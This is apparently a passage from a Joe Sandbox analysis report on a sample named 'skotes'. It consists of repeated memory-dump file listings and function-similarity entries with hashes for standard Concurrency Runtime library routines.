                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2363638799-0
                                                                                                                                                                                                                                                  • Opcode ID: 8a9a4ab89fd1cd014395b655dad4f45a4e9984f84926be82db2e8f95ad59104b
                                                                                                                                                                                                                                                  • Instruction ID: f10da841a8d7c91094392b61fb75e390e9ca17ca0c681649e8e2cd78c55b8646
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a9a4ab89fd1cd014395b655dad4f45a4e9984f84926be82db2e8f95ad59104b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E51A031A00205DBDF14EF52C895FAEBB71AF44314F1441BAE9026B396CB78AE02CB95
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d93e30bc32a8a5b9cf36676e42b0014b58f7f0692c33aca4ca153a2733d02af8
                                                                                                                                                                                                                                                  • Instruction ID: 6ecd6eee3d1f41882b2bbd2d8482634aeee47c5cc58c1b3b63d159b4d78ad356
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d93e30bc32a8a5b9cf36676e42b0014b58f7f0692c33aca4ca153a2733d02af8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D051BEB2E02A168BDB15CF59D8817AEB7F1FB58304F24896BC505EB390D378A940CF58
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0048F2BB
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: pEvents
                                                                                                                                                                                                                                                  • API String ID: 2141394445-2498624650
                                                                                                                                                                                                                                                  • Opcode ID: 6ebecd78291bcac0bf84ba9c37a184d831e6190cb86e52c0e6467f8821366db8
                                                                                                                                                                                                                                                  • Instruction ID: dd102d429e034d4a51ef525c9edf6a93bacb8b860b41613dd6f5118d08452fe3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ebecd78291bcac0bf84ba9c37a184d831e6190cb86e52c0e6467f8821366db8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40818D31D00218DFCF15FFA5C985BAEB7B1AF15314F24486AE801A7282DB3DAD49CB59
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 004A26E3
                                                                                                                                                                                                                                                    • Part of subcall function 004A24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004A2504
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 004A2704
                                                                                                                                                                                                                                                  • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 004A2711
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 004A275F
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 004A27E6
                                                                                                                                                                                                                                                  • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 004A27F9
                                                                                                                                                                                                                                                  • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 004A2846
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2530155754-0
                                                                                                                                                                                                                                                  • Opcode ID: 4aa7dc0a8a3dec5f48b2c9ac781f179429ba7063ccbdf5a199773d83e3230f4b
                                                                                                                                                                                                                                                  • Instruction ID: 50a4b0462bd179917fcf4dda83e92d14dae44c0a225d9d4b6f809a9476c67591
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aa7dc0a8a3dec5f48b2c9ac781f179429ba7063ccbdf5a199773d83e3230f4b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F581A274900249ABDF169F58CA41BBF7B75AF66308F04009AFC4127352C7BE8E15EB65
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 004A2982
                                                                                                                                                                                                                                                    • Part of subcall function 004A24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004A2504
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 004A29A3
                                                                                                                                                                                                                                                  • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 004A29B0
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 004A29FE
                                                                                                                                                                                                                                                  • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 004A2AA6
                                                                                                                                                                                                                                                  • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 004A2AD8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
